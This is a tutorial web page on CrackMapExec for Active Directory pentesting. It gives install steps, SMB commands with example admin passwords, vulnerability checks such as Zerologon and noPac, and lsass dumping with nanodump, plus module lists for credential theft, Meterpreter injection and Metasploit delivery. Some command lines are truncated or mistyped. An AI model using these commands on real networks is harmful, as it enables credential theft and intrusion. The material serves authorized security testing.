CrackMapExec (also known as CME) is a post-exploitation program that assists in automating the security assessment of large Active Directory infrastructures.

CME was designed with stealth in mind, exploiting built-in Active Directory functionality to achieve its functionality and evading most endpoint protection/IDS/IPS technologies.

CrackMapExec Tutorial

How to Install CrackMapExec

If you are using Kali you can install it from Kali repos but I recommend you install it from git source.

apt install crackmapexec

In this article I will install it on a Linux machine but if you need you can use it on Windows or using docker.

First, let’s install some dependencies

apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
git clone
cd CrackMapExec
poetry install
poetry run crackmapexec

Configure Databases

Configure new Certificate

CME Configuration folder

└─$ cd ~/.cme

Change CrackMapExec certificate

└─$ vi ~/.cme/cme.conf
└─$ openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem

Target Definition

crackmapexec <protocol>
crackmapexec <protocol>
crackmapexec <protocol>
crackmapexec <protocol>
crackmapexec <protocol> ~/targets.txt

CME Supported Protocols


Samba Protocol

We will start scanning a network as an example and then a specific host on the network

crackmapexec smb
crackmapexec smb

Search Text Files

crackmapexec smb -u 'Administrator' -p 'poplab!sec' --spider C\$ --pattern txt

CME SMB Modules


SMB ModuleDescription
ZeroLogonModule to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
PetitpotamModule to check if the DC is vulnerable to PetitPotam, credit to @topotam
ms17-010MS17-010, /!\ not tested oustide home lab
dfscoerceModule to check if the DC is vulnerable to DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
nopacCheck if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
shadowcoerceModule to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam


gpp_autologinSearches the domain controller for registry.xml to find autologon information and returns the username and password.
gpp_passwordRetrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
handlekatzGet lsass dump using handlekatz64 and parse the result with pypykatz
hash_spiderDump lsass recursively from a given hash using BH to find local admins
keepass_discoverSearch for KeePass-related files and process.
keepass_triggerSet up a malicious KeePass trigger to export the database in cleartext.
lsassyDump lsass and parse the result remotely with lsassy
maskyRemotely dump domain user credentials via an ADCS and a KDC
teams_localdbRetrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
wdigestCreates/Deletes the ‘UseLogonCredential’ registry key enabling WDigest cred dumping on Windows >= 8.1
wirelessGet key of all wireless interfaces

Scan for Samba vulnerabilities with CME


crackmapexec smb <ip> -u '' -p '' -M zerologo


crackmapexec smb <ip> -u '' -p '' -M petitpotam


crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac


crackmapexec smb $TARGET -u Administrator -p 'qwerty12345' -M nanodump
[*] nanodump module options:

TMP_DIR             Path where process dump should be saved on target system (default: C:\Windows\Temp\)
NANO_PATH           Path where nano.exe is on your system (default: /tmp/cme/)
NANO_EXE_NAME       Name of the nano executable (default: nano.exe)
DIR_RESULT          Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)

MSSQL Protocol

CrackMapExec Modules to attack MsSQL Service.

MsSQL Modules

CrackMapExec Tutorial: Pentesting networks 3
empire_execUses Empire’s RESTful API to generate a launcher for the specified listener and executes it
met_injectDownloads the Meterpreter stager and injects it into memory
mssql_privEnumerate and exploit MSSQL privileges
nanodumpGet lsass dump using nanodump and parse the result with pypykatz
test_connectionPings a host
web_deliveryKicks off a Metasploit Payload using the exploit/multi/script/web_delivery module

CrackMapExec for Privilege Escalation

Privilege escalation holds a significant role in security assessments as it enables testers to enhance their level of access within a system. By gaining additional privileges, such as accessing more users, hosts, and resources, security assessments can advance closer to achieving their objectives.

This phase is crucial as it helps in identifying vulnerabilities and weaknesses that could be exploited by malicious actors.


What is CrackMapExec?

CrackMapExec (CME) is a free and open-source tool used for network enumeration and penetration testing, particularly on Windows networks. It allows pentesters to gather information about hosts, services, users, and groups within a network.

Is CrackMapExec legal to use?

Using CrackMapExec is legal only with explicit permission from the network owner. Using it on unauthorized networks is illegal and can have serious legal consequences.

What are the ethical considerations of using CrackMapExec?

CME is a powerful tool, and its use should adhere to ethical hacking principles. It should only be used in controlled environments with proper authorization and for legitimate security testing purposes.

Is CrackMapExec still maintained?

The original CrackMapExec project is no longer actively maintained. However, there are community-maintained forks available.